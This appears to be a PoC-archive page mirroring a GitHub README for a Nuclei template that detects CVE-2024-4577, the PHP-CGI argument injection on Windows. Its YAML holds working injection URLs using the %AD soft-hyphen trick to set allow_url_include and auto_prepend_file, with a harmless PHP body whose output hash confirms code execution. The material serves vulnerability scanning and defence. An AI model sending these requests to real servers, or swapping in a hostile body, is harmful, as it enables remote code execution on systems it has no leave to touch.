Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Source
https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template
Associated Vulnerability
Title:Argument Injection in PHP-CGI (CVE-2024-4577)
Description:In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Readme
# CVE-2024-4577 Nuclei Template

This repository contains a Nuclei template to detect the PHP CGI Argument Injection vulnerability identified as CVE-2024-4577.

## Template Details

```yaml
id: CVE-2024-4577

info:
  name: CVE-2024-4577 PHP CGI Argument Injection
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
    This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
  tags: cve,cve2024,php,cgi,rce,cve2024-4577

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      
    headers:
      User-Agent: "curl/8.3.0"
      Accept: "*/*"
      Content-Type: "application/x-www-form-urlencoded"
      Connection: "keep-alive"
    body: |
      <?php echo md5("CVE_2024_4577_TEST"); ?>
    matchers:
      - type: word
        part: body
        words:
          - "83946a388fdf6cd2707eed8550575a76"

```

## Usage

To use this template with Nuclei, save the template content into a file named `CVE-2024-4577.yaml` and run the following command:

```bash
nuclei -t CVE-2024-4577.yaml -u <target-url>
```
Replace `<target-url>` with the URL of the target you want to scan.

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →